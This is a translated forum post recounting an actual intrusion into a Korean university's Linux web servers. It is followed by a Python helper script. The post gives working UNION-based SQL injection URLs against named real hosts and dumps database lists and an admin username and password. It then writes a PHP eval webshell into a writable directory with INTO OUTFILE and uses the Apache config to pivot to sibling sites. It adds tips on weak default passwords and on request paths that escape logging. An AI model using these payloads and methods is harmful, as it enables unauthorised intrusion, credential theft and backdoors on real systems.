A summary of the experiences of a Linux Server intrusion in Korea

Source: Internet
Author: User
Tags: upload, php

I forgot who posted the injection point in the group; it looks like it came out of security testing against foreign sites, South Korea in particular. At the time it was a very simple injection point:

    http://ship.iuk.ac.kr/sub5_4.php?seq=-1+union+select+1,2,3,4,6,7,8,9,10,11,12,13,14,15,16,17

which returned: ship root@localhost 5.0.51a-community-log (database, user and version).

Listing the databases:

    http://ship.iuk.ac.kr/sub5_4.php?seq=-1+union+select+…,GROUP_CONCAT(DISTINCT+table_schema),…+from+information_schema.columns

gives: information_schema, JIU_WEB, arch, autoe, beauty, biz, cs, docman, ece, ecse, edu, eee, ese, fashion, fire, fn, food, free, fs, fsc, fund, gteri, haksa_db, japan, jimuse, jkufw, klc, media, mysql, nr, omi, omi_new, pa, pt, radi, sanhak, semu, ship, spe, sports.

Listing the tables of one database (0x72616469 is the hex literal for 'radi'):

    http://ship.iuk.ac.kr/sub5_4.php?seq=-1+union+select+…,GROUP_CONCAT(DISTINCT+table_name),16,17+from+information_schema.columns+where+table_schema=0x72616469

gives: admin, free, job, notice, pds, photo, plan, popup, qna, schedule, time.

Listing the columns of a table (0x61646D696E is 'admin'):

    http://ship.iuk.ac.kr/sub5_4.php?seq=-1+union+select+…,GROUP_CONCAT(DISTINCT+column_name),16,17+from+information_schema.columns+where+table_name=0x61646D696E

Up to here nothing is out of the ordinary; it is just the familiar routine for anyone who has walked this road before. Then the problems start:

1. The connection is root, but the MySQL password hash could not be cracked at the time, and even if it were, the host entry for that user in mysql.user is not %, so it cannot be used remotely.
2. The connection is root, but a webshell cannot be written.
3. The backend password is in hand, but the backend itself cannot be found.

So I want to talk about my experience with South Korean websites. My personal take: it is not that nothing works, it is that the usual route is the wrong one. The two difficulties are: 1. the backend is hard to find; 2. uploading a webshell is hard.
Korean websites are mostly PHP, PHP sites mostly run on Linux servers, and Linux paths are case sensitive. Sometimes the backend is Admin rather than admin and you hit a wall; likewise phpmyadmin may really be phpMyAdmin and you have to try again. Beyond that, not many of the kr sites I have seen put the backend under the admin path, and I do not know why; many backends are named "borad". Hard to make sense of, but fortunately the backend login passwords of many kr sites are simple to the point of death, admin/1234 and the like.

Uploading a webshell comes down to Linux file and directory permissions, and in this respect the administrators of kr sites are very competent: sites rarely have writable directories, so the chance of writing a webshell into a site is greatly reduced. A site whose content is updated must have a writable directory somewhere, but do not write a webshell on a hunch; go and find the writable directory rather than writing into one you assume exists. A folder named upload may not be writable, and fckeditor's directories may have no writable path either. On Chinese sites I had gotten used to fckeditor being a reliable little helper for dropping a webshell; when I saw it on a kr site I went straight for the upload, and the upload failed even though the vulnerability was there. Dude, is a Linux server like a domestic one, where you can write anywhere?

This site got a write-up because of exactly that experience. Checking the sites on the same IP took under five minutes: the first was http://radi.iuk.ac.kr/admin, and the last was admin.pdf. Compare the third-level domain with the database list injected above: this site's database should be radi. Continue injecting, table admin, fields id and passwd:

    http://ship.iuk.ac.kr/sub5_4.php?seq=-1+union+select+…,GROUP_CONCAT(DISTINCT+id,0x5f,passwd),…+from+radi.

which yields radio and 111radio (0x5f is the underscore separator).
The next step is to go into the backend and look for a writable directory (not for somewhere to upload a webshell: in most cases a PHP backdoor cannot be uploaded, and even where an upload function exists the upload fails because the directory is not writable). This address

    http://radi.iuk.ac.kr/editor/inc/ddimage.php?img_path=/home/radi/public_html/admin/job/img

directly exposes a physical writable path, so /home/radi/public_html/admin/job/img is known to be writable; mind the case. Since the database connection is root, I helped myself:

    http://ship.iuk.ac.kr/sub5_4.php?seq=-1+union+select+0x3C3F706870206576616C28245F504F53545B2763275D293F3E+into+outfile+'/home/radi/public_html/admin/job/img/bbb.php'

(the hex literal is <?php eval($_POST['c'])?>), which gives a webshell at:

    http://radi.iuk.ac.kr/admin/job/img/bbb.php

Environment: Apache/2.0.61 (Unix) DAV/2 PHP/4.4.7, an older setup. Locate the Apache configuration file; here it is /usr/local/apache-2.0.61/conf/httpd.conf. Search it for the domain ship.iuk.ac.kr and you get its configuration:

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/ship/public_html
    ServerName ship.iuk.ac.kr

Find a writable directory there and run cp, and you have a webshell on that site as well. In this case, though, cp is just pulling your trousers down to fart: file permissions on Korean Linux hosts are so strict that even with a webshell on a site you cannot change anything. And if the aim is privilege escalation, doesn't cp amount to the same thing as above?

Appendix: Apache configuration file

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/ece/public_html
    ServerName ece.iuk.ac.kr
    ServerAlias m1.adbank.co.kr

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/ese/public_html
    ServerName ese.iuk.ac.kr

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/spe/public_html
    ServerName spe.iuk.ac.kr

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/edu/public_html
    ServerName edu.iuk.ac.kr

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/jkufw/public_html
    ServerName jkufw.iuk.ac.kr

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/pa/public_html
    ServerName pa.iuk.ac.kr

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/semu/public_html
    ServerName semu.iuk.ac.kr

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/media/public_html
    ServerName hospital.iuk.ac.kr

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/biz/public_html
    ServerName biz.iuk.ac.kr

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/gteri/public_html
    ServerName hotel.iuk.ac.kr

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/japan/public_html
    ServerName japan.iuk.ac.kr

    SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
    CustomLog /usr/local/apache/logs/class.log combined env=!not_log
    DocumentRoot /home/food/public_html
    ServerName food.iuk.ac.kr
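The two things the post hinges on, which DocumentRoot each vhost serves and where under it the web server can actually create a file, turned into a small audit a defender could run on such a host. This is an added example and not code from the original post. The sample configuration is a constructed excerpt of the appendix above (the VirtualHost tags were lost in extraction, so a block is read as the DocumentRoot/ServerName/ServerAlias lines that belong together); the directory tree, the stand-in httpd uid and gid, and the prefix public_html_ in demo_writable_scan are hypothetical. Directory writability is judged from mode bits alone, so ACLs, the sticky bit and mount options are ignored. The mirror of the not_log rule follows mod_setenvif, which matches Request_URI without the query string.

```python
"""Audit helpers for the vhost/DocumentRoot/writable-directory hunt described
above. Added example, not the original post's code."""
import os
import re
import stat
import tempfile

# Constructed excerpt of the appendix; VirtualHost tags are absent there too.
SAMPLE_CONF = """
SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
CustomLog /usr/local/apache/logs/class.log combined env=!not_log
DocumentRoot /home/ship/public_html
ServerName ship.iuk.ac.kr

SetEnvIfNoCase Request_URI ".(bmp|gif|jpg|jpeg|png|css|js|java)$" not_log
CustomLog /usr/local/apache/logs/class.log combined env=!not_log
DocumentRoot /home/ece/public_html
ServerName ece.iuk.ac.kr
ServerAlias m1.adbank.co.kr
"""


def parse_vhosts(conf_text):
    """Map every ServerName/ServerAlias to the DocumentRoot that precedes it,
    which is the order the directives appear in on the page."""
    vhosts, docroot = {}, None
    for line in conf_text.splitlines():
        parts = line.split()
        if not parts:
            continue
        if parts[0] == "DocumentRoot":
            docroot = parts[1]
        elif parts[0] in ("ServerName", "ServerAlias") and docroot:
            for name in parts[1:]:
                vhosts[name] = docroot
    return vhosts


# The regex exactly as it stands in the appendix: the dot is unescaped, so it
# matches any single character, and SetEnvIfNoCase makes it case-insensitive.
NOT_LOG = re.compile(r".(bmp|gif|jpg|jpeg|png|css|js|java)$", re.IGNORECASE)


def is_logged(request_uri):
    """Mirror CustomLog ... env=!not_log: False means the request never reaches
    class.log. The query string is dropped first, as mod_setenvif does."""
    path = request_uri.split("?", 1)[0]
    return NOT_LOG.search(path) is None


def _can_create_in(st, uid, gids):
    """Classic Unix check: owner class first, then group, then other. Creating a
    file needs both write and search (x) permission on the directory."""
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR and mode & stat.S_IXUSR)
    if st.st_gid in gids:
        return bool(mode & stat.S_IWGRP and mode & stat.S_IXGRP)
    return bool(mode & stat.S_IWOTH and mode & stat.S_IXOTH)


def find_writable_dirs(root, uid, gids):
    """Directories under root (relative paths) that a process running as
    uid/gids could create files in, judged from mode bits only."""
    hits = []
    for dirpath, _dirnames, _files in os.walk(root):
        if _can_create_in(os.stat(dirpath), uid, gids):
            hits.append(os.path.relpath(dirpath, root))
    return sorted(hits)


def demo_writable_scan():
    """Throwaway docroot shaped like the one in the post: everything 0755 except
    admin/job/img, the path ddimage.php exposed, which is world-writable.
    The httpd account is a hypothetical uid/gid that is deliberately not ours,
    so ownership of the freshly created tree does not count as access."""
    root = tempfile.mkdtemp(prefix="public_html_")
    os.chmod(root, 0o755)
    for rel, mode in (("admin", 0o755), ("admin/job", 0o755),
                      ("admin/job/img", 0o777),
                      ("editor", 0o755), ("editor/inc", 0o755)):
        path = os.path.join(root, rel)
        os.makedirs(path)
        os.chmod(path, mode)
    web_uid, web_gid = os.getuid() + 1, os.getgid() + 1
    return find_writable_dirs(root, web_uid, {web_gid})


if __name__ == "__main__":
    print(parse_vhosts(SAMPLE_CONF))
    print(demo_writable_scan())
    print(is_logged("/admin/job/img/bbb.php?c=phpinfo();"),
          is_logged("/admin/job/img/logo.jpg"))
```

Pointing find_writable_dirs at each DocumentRoot from parse_vhosts with the real httpd uid and gids gives the list the author had to dig out of ddimage.php by hand. The is_logged mirror makes the logging caveat concrete: the shell's own requests (bbb.php?c=...) do land in class.log, but any request whose path ends in one of the listed extensions leaves no trace there at all.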